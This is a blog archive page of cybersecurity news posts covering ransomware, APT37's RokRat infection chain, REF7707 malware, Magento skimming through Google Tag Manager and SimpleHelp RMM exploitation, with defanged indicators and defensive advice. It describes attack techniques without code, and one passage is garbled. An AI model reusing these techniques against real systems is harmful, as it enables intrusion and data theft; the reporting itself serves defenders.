Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Hacking. Show all posts
Hacking
AI technology AI Threat CrowdStrike Cyber Security cyber threat CyberCrime cybercriminals Hacking

Cybercrime in 2025: AI-Powered Attacks, Identity Exploits, and the Rise of Nation-State Threats

 


Cybercrime has evolved beyond traditional hacking, transforming into a highly organized and sophisticated industry. In 2025, cyber adversaries — ranging from financially motivated criminals to nation-state actors—are leveraging AI, identity-based attacks, and cloud exploitation to breach even the most secure organizations. The 2025 CrowdStrike Global Threat Report highlights how cybercriminals now operate like businesses. 

One of the fastest-growing trends is Access-as-a-Service, where initial access brokers infiltrate networks and sell entry points to ransomware groups and other malicious actors. The shift from traditional malware to identity-based attacks is accelerating, with 79% of observed breaches relying on valid credentials and remote administration tools instead of malicious software. Attackers are also moving faster than ever. Breakout times—the speed at which cybercriminals move laterally within a network after breaching it—have hit a record low of just 48 minutes, with the fastest observed attack spreading in just 51 seconds. 

This efficiency is fueled by AI-driven automation, making intrusions more effective and harder to detect. AI has also revolutionized social engineering. AI-generated phishing emails now have a 54% click-through rate, compared to just 12% for human-written ones. Deepfake technology is being used to execute business email compromise scams, such as a $25.6 million fraud involving an AI-generated video. In a more alarming development, North Korean hackers have used AI to create fake LinkedIn profiles and manipulate job interviews, gaining insider access to corporate networks. 

The rise of AI in cybercrime is mirrored by the increasing sophistication of nation-state cyber operations. China, in particular, has expanded its offensive capabilities, with a 150% increase in cyber activity targeting finance, manufacturing, and media sectors. Groups like Vanguard Panda are embedding themselves within critical infrastructure networks, potentially preparing for geopolitical conflicts. 

As traditional perimeter security becomes obsolete, organizations must shift to identity-focused protection strategies. Cybercriminals are exploiting cloud vulnerabilities, leading to a 35% rise in cloud intrusions, while access broker activity has surged by 50%, demonstrating the growing value of stolen credentials. 

To combat these evolving threats, enterprises must adopt new security measures. Continuous identity monitoring, AI-driven threat detection, and cross-domain visibility are now critical. As cyber adversaries continue to innovate, businesses must stay ahead—or risk becoming the next target in this rapidly evolving digital battlefield.
Read more »
Threat Intelligence
APT37 Cyberattack Cybersecurity Data Breach Hacking North Korea phishing RokRat Threat Intelligence

North Korean Hackers Exploit ZIP Files in Sophisticated Cyber Attacks

 

State-sponsored hacking group APT37 (ScarCruft) is deploying advanced cyber-espionage tactics to infiltrate systems using malicious ZIP files containing LNK shortcuts. These files are typically disguised as documents related to North Korean affairs or trade agreements and are spread through phishing emails.

Once opened, the attack unfolds in multiple stages, leveraging PowerShell scripts and batch files to install the RokRat remote access Trojan (RAT) as the final payload.

The infection starts with carefully crafted phishing emails, often using real information from legitimate websites to enhance credibility. These emails contain malicious ZIP attachments housing LNK files. When executed, the LNK file verifies its directory path, relocating itself to %temp% if necessary.

It then extracts multiple components, including:

-A decoy HWPX document
-A batch script (shark.bat)

Additional payloads like caption.dat and elephant.dat
The shark.bat script executes PowerShell commands discreetly, launching the elephant.dat script, which decrypts caption.dat using an XOR key. The decrypted content is then executed in memory, ultimately deploying RokRat RAT.

Once active, RokRat collects detailed system information, such as:
  • Operating system version
  • Computer name
  • Logged-in user details
  • Running processes
  • Screenshots of the infected system
The stolen data is then exfiltrated to command-and-control (C2) servers via legitimate cloud services like pCloud, Yandex, and Dropbox, utilizing their APIs to send, download, and delete files while embedding OAuth tokens for stealthy communication.

RokRat also allows attackers to execute remote commands, conduct system reconnaissance, and terminate processes. To avoid detection, it implements anti-analysis techniques, including:
  • Detecting virtual environments via VMware Tools
  • Sandbox detection by creating and deleting temporary files
  • Debugger detection using IsDebuggerPresent
The malware ensures secure communication by encrypting data using XOR and RSA encryption, while C2 commands are received in AES-CBC encrypted form, decrypted locally, and executed on the compromised system. These commands facilitate data collection, file deletion, and malware termination.

By leveraging legitimate cloud services, RokRat seamlessly blends into normal network traffic, making detection more challenging.

“This sophisticated approach highlights the evolving tactics of APT37, as they continue to adapt and expand their operations beyond traditional targets, now focusing on both Windows and Android platforms through phishing campaigns.”

As APT37 refines its cyberattack strategies, organizations must remain vigilant against such persistent threats and enhance their cybersecurity defenses.
Read more »
Hacking
Australia Cyber Attacks cyberattack news data stealing Hacking

University of Notre Dame Hit by Cyberattack— Hackers Say They Stole Everything

 



A cybercriminal group known as Fog Ransomware has claimed responsibility for a cyberattack on the University of Notre Dame in Perth, Australia. According to reports, the group has allegedly stolen 62.2GB of sensitive data, including student medical records, staff and student contact information, and confidential documents.  


Hackers Announce Data Theft on the Dark Web  

The university was first alerted to a cybersecurity breach in January 2025. Recently, technology news sources revealed that Fog Ransomware had posted details of the attack on its dark web leak site. The group claimed to have accessed and stolen a large amount of private and institutional information.  

As of now, the hackers have not made any ransom demands or issued a deadline for payment. Cybersecurity experts believe that this group has a history of targeting educational and recreational institutions worldwide.  


How the Attack Has Affected the University  

The cyberattack has disrupted essential university operations, making it difficult for students and staff to access key services. Some of the areas impacted include:  

1. Payroll and leave management – Employees have been unable to process payments and leave applications as usual. Temporary manual processes have been put in place.  

2. Student enrolments and timetables – Many students have struggled to access their class schedules and register for courses.  

3. Communication services – Internet and email systems have also been affected, causing delays in official university communication.  

University official Patrick Hampton, who is both the Deputy Head of Education and President of the National Tertiary Education Union WA Notre Dame branch, stated that the attack had disrupted critical functions necessary for the university’s daily operations. He also emphasized that staff and students need additional support to cope with these challenges.  


Uncertainty Over the Full Extent of the Data Breach  

At this stage, the university has not been able to confirm exactly what data has been stolen. A spokesperson explained that while primary systems handling student records, finance, and human resources appear secure, some separately stored data might have been compromised.  

To assess the situation, the university has engaged international cybersecurity experts and is working to determine the extent of the breach. Officials have assured that if any personal data is found to be affected, the university will notify those impacted as soon as possible.  


Response and Future Actions

The incident has been reported to the Australian Cyber Security Centre (ACSC), and the university is taking necessary precautions to strengthen its security measures. Despite the ongoing challenges, the university has confirmed that classes for the 2025 academic year will begin as scheduled.  

Meanwhile, the staff union is pushing for greater transparency from the university administration. They are demanding that university leadership keep staff and students fully informed about what data has been compromised and provide assurances about data protection measures moving forward.  

This attack is a reminder of the increasing cybersecurity threats faced by educational institutions. Universities hold vast amounts of sensitive student and staff data, making them prime targets for cybercriminals. 

Read more »
Ransomware attack
Amsterdam cybercrime investigation Black Basta Cyber Threats Cybersecurity Data Breach Hacking phishing Ransomware Ransomware attack

Internal Chat Logs of Black Basta Ransomware Gang Leaked Online

 

A previously unidentified source has leaked what is claimed to be an archive of internal Matrix chat logs linked to the Black Basta ransomware group. The individual behind the leak, known as ExploitWhispers, initially uploaded the stolen messages to the MEGA file-sharing platform, which has since taken them down. However, they have now made the archive available through a dedicated Telegram channel.

It remains uncertain whether ExploitWhispers is a cybersecurity researcher who infiltrated the group's internal chat server or a discontented member of the operation. While no specific reason was provided for the leak, cybersecurity intelligence firm PRODAFT suggested that it could be a direct consequence of the ransomware gang’s alleged attacks on Russian banks.

"As part of our continuous monitoring, we've observed that BLACKBASTA (Vengeful Mantis) has been mostly inactive since the start of the year due to internal conflicts. Some of its operators scammed victims by collecting ransom payments without providing functional decryptors," PRODAFT stated.

"On February 11, 2025, a major leak exposed BLACKBASTA's internal Matrix chat logs. The leaker claimed they released the data because the group was targeting Russian banks. This leak closely resembles the previous Conti leaks."

The leaked archive contains internal chat messages exchanged between September 18, 2023, and September 28, 2024. A review conducted by BleepingComputer reveals that the messages encompass a broad range of sensitive information, including phishing templates, email addresses for targeting, cryptocurrency wallets, data dumps, victims' login credentials, and confirmations of previously reported attack strategies.

Additionally, the leaked records contain 367 unique ZoomInfo links, potentially reflecting the number of organizations targeted during the specified timeframe. Ransomware groups frequently use ZoomInfo to gather intelligence on their targets, either internally or for negotiations with victims.

ExploitWhispers also disclosed information about key Black Basta members, identifying Lapa as an administrator, Cortes as a threat actor connected to the Qakbot malware group, and YY as the primary administrator. Another individual, referred to as Trump (also known as GG and AA), is believed to be Oleg Nefedov, who is suspected of leading the operation.

Black Basta operates as a Ransomware-as-a-Service (RaaS) group, first emerging in April 2022. The gang has targeted several high-profile organizations across various industries, including healthcare, government contractors, and major corporations.

Notable victims include German defense contractor Rheinmetall, Hyundai's European division, BT Group (formerly British Telecom), U.S. healthcare provider Ascension, government contractor ABB, the American Dental Association, U.K. tech outsourcing firm Capita, the Toronto Public Library, and Yellow Pages Canada.

A joint report from CISA and the FBI, published in May 2024, revealed that Black Basta affiliates compromised more than 500 organizations between April 2022 and May 2024.

Research from Corvus Insurance and Elliptic estimates that the ransomware gang collected approximately $100 million in ransom payments from over 90 victims by November 2023.

This incident bears similarities to the February 2022 data breach involving the Russian-based Conti cybercrime syndicate. At that time, a Ukrainian security researcher leaked over 170,000 internal chat messages and the source code for the Conti ransomware encryptor, following the group's public support for Russia amid the Ukraine conflict.
Read more »
South America
Hacking malware REF7707 South America

Hackers Target South America and Southeast Asia

 



A group of hackers has been caught running a large-scale cyber spying operation, now called REF7707. The attack was first noticed in November 2024 when strange activity was detected in the Foreign Ministry of a South American country. As experts looked deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.  

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a type of software that allowed hackers to secretly take control of a computer. Once installed, they could:  

  • Run commands: Hackers could make the infected computer perform actions, like downloading more malware or collecting sensitive files.  
  • Hide in normal programs: They inserted their malicious code into everyday programs like MS Paint, making it harder for security software to detect.  
  • Use Microsoft’s online services: The hackers used Microsoft Graph API, a service that businesses commonly use, to blend their malicious activities with normal traffic.  


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.  

To further cover their tracks, they hid malware downloads on popular websites, including:  

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: A program designed to manage security certificates, but in this case, hackers misused it to download and install their malware.  
  • Windows Remote Management (WinRM): A legitimate Windows tool that lets administrators control computers remotely. The hackers used this to jump from one system to another, meaning they likely stole passwords from previous attacks.  

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes— and when they do, security teams can use those errors to track them down.  

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Read more »
Website Security
Cyber Security CyberCrime Cybersecurity Data Breach eCommerce Google Tag Manager Hacking Magento malware Payment security Website Security

Cybercriminals Exploit Google Tag Manager to Steal Payment Data from Magento Sites

 

Cybercriminals have been leveraging Google Tag Manager (GTM) to inject malware into Magento-powered eCommerce websites, compromising customer payment data, according to cybersecurity experts.

Security researchers at Sucuri recently detected a live attack where a Magento-based online store suffered a credit card data breach. The investigation led to a malicious script embedded within Google Tag Manager, which, while appearing to be a standard tracking tool, was designed to steal sensitive payment information.

Google Tag Manager is a widely used tag management system that enables website owners to deploy tracking codes without modifying site code directly. However, attackers obfuscate the injected script, making detection difficult. The malware captures payment details at checkout and transmits them to a remote server. Researchers also discovered a backdoor, allowing persistent access to compromised sites.

At least six websites were found infected with the same GTM ID, and one domain used in the attack, eurowebmonitortool[dot]com, has now been blacklisted by major security firms. Cybersecurity experts emphasize that this attack method is not new. Sucuri researchers had previously identified similar threats, reaffirming that this technique is "still being widely used."

Given its popularity among eCommerce businesses, Magento remains a primary target for cybercriminals. Stolen payment data can be exploited for fraudulent purchases, malvertising campaigns, and other illicit activities.

Security Measures for Protection
To mitigate risks, website administrators should:
  • Remove any suspicious GTM tags
  • Conduct a full security scan
  • Ensure Magento and all extensions are updated
  • Regularly monitor site traffic and GTM configurations for anomalies
Proactive cybersecurity measures and ongoing vulnerability monitoring are crucial to safeguarding eCommerce platforms from such sophisticated attacks.
Read more »
Password Manager
Credentials cyber attack Cybersecurity Digital Security Hacking Infostealer malware MFA Password Manager

Cybercriminals Intensify Attacks on Password Managers

 

Cybercriminals are increasingly setting their sights on password managers as a way to infiltrate critical digital accounts.

According to Picus Security’s Red Report 2025, which analyzed over a million malware samples from the past year, a quarter (25%) of all malware now targets credentials stored in password managers. Researchers noted that this marks a threefold surge compared to the previous year.

“For the first time ever, stealing credentials from password stores is in the top 10 techniques listed in the MITRE ATT&CK Framework,” they said. “The report reveals that these top 10 techniques accounted for 9Beyond the growing frequency of attacks, hackers are also deploying more advanced techniques. 3% of all malicious actions in 2024.”

Advanced Hacking Techniques

Dr. Suleyman Ozarslan, co-founder and VP of Picus Labs, revealed that cybercriminals use sophisticated methods like memory scraping, registry harvesting, and breaching both local and cloud-based password stores to extract credentials.

To counter this rising threat, Ozarslan emphasized the importance of using password managers alongside multi-factor authentication (MFA). He also warned against password reuse, particularly for password.

Beyond the growing frequency of attacks, hackers are also deploying more advanced techniques. Picus Security highlighted that modern cybercriminals are now favoring long-term, multi-stage attacks that leverage a new generation of malware. These advanced infostealers are designed for stealth, persistence, and automation.

Researchers compared this evolution in cyber threats to “the perfect heist,” noting that most malware samples execute over a dozen malicious actions to bypass security defenses, escalate privileges, and exfiltrate data.

A password manager is a cybersecurity tool that securely stores, generates, and auto-fills strong passwords across websites and apps. By eliminating the need to remember multiple passwords, it strengthens security and reduces the risk of breaches. Experts consider it an essential component of cybersecurity best practices.
Read more »
SimpleHelp RMM
CVE-2024-57726 CVE-2024-57727 CVE-2024-57728 Cyber Attacks Cybersecurity Hacking Ransomware remote monitoring and management SimpleHelp RMM

Hackers Exploit SimpleHelp RMM Vulnerabilities to Deploy Backdoors and Create Admin Accounts

 

Management (RMM) clients to gain administrative control, install backdoors, and possibly set the stage for ransomware deployment.

The vulnerabilities, identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, were initially flagged by Arctic Wolf as potential attack vectors last week. While the firm could not verify active exploitation, cybersecurity company Field Effect has now confirmed their abuse in ongoing cyberattacks.

Field Effect shared its findings with BleepingComputer, highlighting that the attack patterns bear similarities to Akira ransomware activity. However, researchers lack definitive evidence to attribute these attacks with high confidence.

The breach begins when attackers exploit SimpleHelp RMM vulnerabilities to gain unauthorized access to a target system. The initial connection originates from IP address 194.76.227[.]171, linked to an Estonian server running a SimpleHelp instance on port 80.

Once inside, the attackers execute reconnaissance commands to gather information on system architecture, user privileges, network configurations, scheduled tasks, services, and Domain Controller (DC) details. Researchers also observed a specific command attempting to identify the CrowdStrike Falcon security suite, likely as part of an evasion strategy.

Leveraging this access, the hackers create a new administrator account ("sqladmin") to maintain persistence. They then deploy Sliver, a post-exploitation framework (agent.exe) increasingly used as an alternative to Cobalt Strike, which security tools now frequently detect.

Once executed, Sliver connects to a command-and-control (C2) server in the Netherlands, allowing remote command execution. Field Effect also discovered a backup IP with Remote Desktop Protocol (RDP) enabled, indicating additional persistence measures.

After securing initial access, the attackers escalate their attack by compromising the Domain Controller (DC) via the same SimpleHelp RMM client. They create another admin account ("fpmhlttech") and, instead of deploying a conventional backdoor, install a Cloudflare Tunnel disguised as Windows svchost.exe to bypass security defenses and maintain stealthy access.

To safeguard against these threats, SimpleHelp users must immediately apply security updates addressing CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. Users should also:

  • Audit admin accounts: Look for unauthorized accounts like "sqladmin" and "fpmhlttech".
  • Monitor network connections: Check for any connections to suspicious IPs flagged in Field Effect’s report.
  • Restrict RMM access: Limit SimpleHelp usage to trusted IP ranges to prevent unauthorized logins.
By following these security measures, organizations can mitigate risks associated with SimpleHelp RMM vulnerabilities and prevent potential ransomware attacks.
Read more »
Subscribe to: Posts (Atom)